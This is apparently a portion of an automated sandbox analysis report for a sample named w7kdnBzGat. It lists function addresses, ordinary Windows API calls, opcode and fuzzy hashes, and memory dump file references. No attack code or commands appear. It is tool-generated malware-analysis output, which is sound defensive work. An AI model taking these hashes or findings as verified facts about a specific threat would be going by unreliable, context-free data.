Instruction ID: 2229878b5275ce6b54182ac0acd11f31779b34bde2963232b2224009a0ce6322
Opcode Fuzzy Hash: c045d02fbf574329e985317a473110d2a5d318b044f62cbd5271d1beb1eaeb65
Instruction Fuzzy Hash: 1DF0553A300209A7EB149F36E809AAA7F94FFC2714F06005CEA0A8B680C6759893C790

Function 005056EB Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00501B95,?,20001004,00000000,00000002,?,?,00500F0D), ref: 0050571F

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a4007c22df1764dc0a80b469840da95fa72b0bfd50f92cf2abae0fe2e9e08e17
Instruction ID: 35b0683cf7b5c215e948a1d103a9136ec39f49c3fd0720b1239917b3ca7a24e3
Opcode Fuzzy Hash: a4007c22df1764dc0a80b469840da95fa72b0bfd50f92cf2abae0fe2e9e08e17
Instruction Fuzzy Hash: 98E01A31500A19FBCF222F60DC0AA9F7F16FF447A0F044410FD05652A19B368921AED4

Function 00504DB9 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_00064C1A,00000001), ref: 00504DD8

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 50edc87d9c84467c853465c42509479096c69da9985b28a233b0bc9e908f6189
Instruction ID: aea2a723cf46f8f96f231f1a396c82c56a696b62ea117ed4ddf1afdbe79d975d
Opcode Fuzzy Hash: 50edc87d9c84467c853465c42509479096c69da9985b28a233b0bc9e908f6189
Instruction Fuzzy Hash: 01D05E71502304BFEB045F60EC5A9583F25FBA0710B100019F9084B3A0EB767C95DE48

Function 00504D84 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_00064C1A,00000001), ref: 00504DA2

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 733a49e6a6ee6e62710d20312964deb6a379e759d2f64871e5976452597a809a
Instruction ID: 2e356a774324cdfb7e8bd774ac1b7145ddc5515e9f567564067fb8b267d22686
Opcode Fuzzy Hash: 733a49e6a6ee6e62710d20312964deb6a379e759d2f64871e5976452597a809a
Instruction Fuzzy Hash: 6CD09EB5603300AFD7049F64E8999583B71FB65705720446DF5119B3B0DB766859EF08

Function 00504DBE Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_00064C1A,00000001), ref: 00504DD8

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 3eb0fd8d8bd63ed1002b81b2e9d9bda8317c6bd09a674de5afaebfe2cca51673
Instruction ID: d54a44b751265e05b6d67a05728b1241ae02c28bf149ba9f24760434b9031175
Opcode Fuzzy Hash: 3eb0fd8d8bd63ed1002b81b2e9d9bda8317c6bd09a674de5afaebfe2cca51673
Instruction Fuzzy Hash: 37D0C9B2946308BFEB145F51FC5A9583F69F791711B100019FA084B3A0EBB67C96EE48

Function 004C8E50 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00028E5F,004C7C6B), ref: 004C8E55

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c661b758c085ae00eb2af9f56049e36772cad6f448f9c518fcde28c1ab668444
Instruction ID: 6e7028bde8b9c86564bfe703e432c16ba4b6657aba506812eabb0fddc6607c92
Opcode Fuzzy Hash: c661b758c085ae00eb2af9f56049e36772cad6f448f9c518fcde28c1ab668444
Instruction Fuzzy Hash:

Function 005136D3 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 005136D3

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 259ce30ae0f908365d05ccfed55a6768121baed922c500331c39096f94e947b4
Instruction ID: 8358cb45045285eba117944c90f08b452f381b0e6ed6795c7805e66ed19453e0
Opcode Fuzzy Hash: 259ce30ae0f908365d05ccfed55a6768121baed922c500331c39096f94e947b4
Instruction Fuzzy Hash: 35A012303003048F43104F355A052083EF85A5528130080265004C0020EA294218AF01

Function 004FC846 Relevance: .7, Instructions: 655COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 51d558bcfd81f7f8595a7f86359047c2ba78591e8908c61d7e294f153ecee86d
Instruction ID: 0599d5111ba47aea8d508bff4e89dd58bf2b7165ec7674c50601ccf0eedb8afb
Opcode Fuzzy Hash: 51d558bcfd81f7f8595a7f86359047c2ba78591e8908c61d7e294f153ecee86d
Instruction Fuzzy Hash: BF32AD74A0020E9FCF18CF58CAC5ABEBBB5EF45304F24416ADD45A7345D636AE46CB90

Function 004DD17E Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23bab4d83853eab3d28487f8018d2df13fc56137540e1481952cee5db28862b1
Instruction ID: 1ee58fdf27e1f42d8c5e18ce56c73ba312ef859c1f3d9c6cae692e68cb59b298
Opcode Fuzzy Hash: 23bab4d83853eab3d28487f8018d2df13fc56137540e1481952cee5db28862b1
Instruction Fuzzy Hash: D4124C71E002299FDB25CF18C890BAAB7B9BF4A305F0441EBD949EB344D7749E818F85

Function 004E0690 Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7000974be049192131350adfcdae873b504a45b690b88df12826bc22e9ef8360
Instruction ID: 345b0c098c07afbbe45e8b5fef76aa7c9c08d3393687c23edd052bb487a30b36
Opcode Fuzzy Hash: 7000974be049192131350adfcdae873b504a45b690b88df12826bc22e9ef8360
Instruction Fuzzy Hash: 4EE1A071A002688FDB25DF1AC880BAAB7B8FF45305F1441EBD859A7345E7B49E81CF85

Function 004F3428 Relevance: .3, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2869e6ff69e6f6f91fc2b61ea95595615b83a34d10e600b7aa8dd07fd97c4462
Instruction ID: efd6065d1ac6441b7b39efcb4fc4040b07ec745ff22bf692667360e1eebab96b
Opcode Fuzzy Hash: 2869e6ff69e6f6f91fc2b61ea95595615b83a34d10e600b7aa8dd07fd97c4462
Instruction Fuzzy Hash: 83C1EEB4A0060E9FDB25CF28C48067FBBE1AB45316F14461FD6529B391C738AE46CB5A

Function 00512549 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: b92c78cc58f805d437f3079708f2ae09fcc5d8ed4e566c1aa40821894056d2a2
Instruction ID: c176ed2f4d775555c57b073236f46e598b8644ae21c4e397aa51ee80ea919ac0
Opcode Fuzzy Hash: b92c78cc58f805d437f3079708f2ae09fcc5d8ed4e566c1aa40821894056d2a2
Instruction Fuzzy Hash: AAB1FA355007069BEB389B25CC92AF7B7E9FF44308F54492DE943C6680EB75A9D5CB10

Function 004AD1A0 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f65af7031ba70b6b2af7b56f0fd6d838886973bcd9efc7715f7a35943d8e372e
Instruction ID: 3c931730692173a1290eb850ce518014cd80cc78726ff8724a9b73a7a2abc3a3
Opcode Fuzzy Hash: f65af7031ba70b6b2af7b56f0fd6d838886973bcd9efc7715f7a35943d8e372e
Instruction Fuzzy Hash: 4FB1B072D112188ADB15CFB9C4402DDF7B1AFBA310F29C36BE815B7720E735A9818B54

Function 004E0250 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0db3581d427fb4df2b6cfb5ced444953865a43ed8ff0cee872703f7469e7142
Instruction ID: 45336a15e4015ebdbe1ab268ea49bbdde1db7084edb48cf187330bb9d4f69f8f
Opcode Fuzzy Hash: d0db3581d427fb4df2b6cfb5ced444953865a43ed8ff0cee872703f7469e7142
Instruction Fuzzy Hash: B9A16E75A001689BCB24DF19C880BEEB7F5FB89305F5441EBD919A7341D7749E828F84

Function 004DDC51 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78d9c6bb88abf8c57ce98d899f140ffbce37f897a5a04e34b65e894fb916a492
Instruction ID: 339e434ef3e15bed2c214bf121b3698e8bb8b6319fcf31c997e2733a7a3b5048
Opcode Fuzzy Hash: 78d9c6bb88abf8c57ce98d899f140ffbce37f897a5a04e34b65e894fb916a492
Instruction Fuzzy Hash: 59517271E00219AFDF14CF99C951AEEBBB2FF88300F19805AE815AB341D734AE51CB94

Function 004CA690 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 9d4f9f46fc98f58ea279a55c2a91c40bdd84cf88930a095e33ca4c50993e7fcd
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: A8113B7F30204983D684863DC9B4FBBA395FAC532C72D837FC0824B754D12AD871960A

Function 00505F16 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 185e5c205df99b218101cf9afdce9cef3a448f197bd2e721008c02ba1e043abf
Instruction ID: 8df4dd6a0cfd881c346a9db1c6b3db6389cebc9b3bd51da22aea4c073b3d93db
Opcode Fuzzy Hash: 185e5c205df99b218101cf9afdce9cef3a448f197bd2e721008c02ba1e043abf
Instruction Fuzzy Hash: 68F090B26447229BCB169A5C865DBAE7FA8FB45B10F150052E601EB2D1E2B4DE04CBC0

Function 00505D3C Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c20b847790ab045db628987bf7ae2414269ce035c2496532fc86cc06ac0b1d33
Instruction ID: ec6d6b6ce21c46284bafe660d326c213933c51a1c9f2e627e56f0cbc68495cb9
Opcode Fuzzy Hash: c20b847790ab045db628987bf7ae2414269ce035c2496532fc86cc06ac0b1d33
Instruction Fuzzy Hash: 5CF04432240A41AFCB16CA28C52CB3E7FA8FB45300F200966A506EB2D1E630EF408A00

Function 00505EA1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a94e67f58f6f35ba0bbca23225922e8141813cbbd8816f37aa5dbd847256939
Instruction ID: 7d51b2d634737c3f554fc4b82bb2bfe71dd71a7c3ef6a3381ae3034090c00ae5
Opcode Fuzzy Hash: 3a94e67f58f6f35ba0bbca23225922e8141813cbbd8816f37aa5dbd847256939
Instruction Fuzzy Hash: 56F03032651B24DFCB16CB4CD809A9A7BBCFB44B51F610097E541E7290D6B0EE04CBD0

Function 00505CF9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bae47005b48fab7e0d49e4171449ee391734f61f8862dc3a5dbe42aba8196673
Instruction ID: 236ffa0e63de234e38b244f29bd73a5866234743c2bd7b61802c4f513591b464
Opcode Fuzzy Hash: bae47005b48fab7e0d49e4171449ee391734f61f8862dc3a5dbe42aba8196673
Instruction Fuzzy Hash: ECE06D31600744DFCB15CF69C558A4ABBF8FB44345F6044A9E405D7290E334EE44CB10

Function 00505CB6 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b680907f79bc32fadd0b435358befdb5a9863ae498a61046618e76b1224f23
Instruction ID: f4ace7a0ee7aaeb53d5aa2dd1caebff56ca77e869ec62cec139f2b95fad01160
Opcode Fuzzy Hash: 78b680907f79bc32fadd0b435358befdb5a9863ae498a61046618e76b1224f23
Instruction Fuzzy Hash: 0BE03232A00745EFCB09CB68C558A4ABBF8FB88345F2040A8E809C7690E234EE44CB40

Function 00505EE5 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64d0b50f5c1755b60d15d8b32736556bdf1cbbff35e9f1474ebf1b80bec4e9ca
Instruction ID: 0cc468ee801232cdb7566b51b5e57f595032d5bd2a3c6d052d0a69d0ca9e75ad
Opcode Fuzzy Hash: 64d0b50f5c1755b60d15d8b32736556bdf1cbbff35e9f1474ebf1b80bec4e9ca
Instruction Fuzzy Hash: B7E08CB2911629EBCB14DF89C908D8EF7ECFB84B40B150496B601E3140D274DE00CBD0

Function 00505D97 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
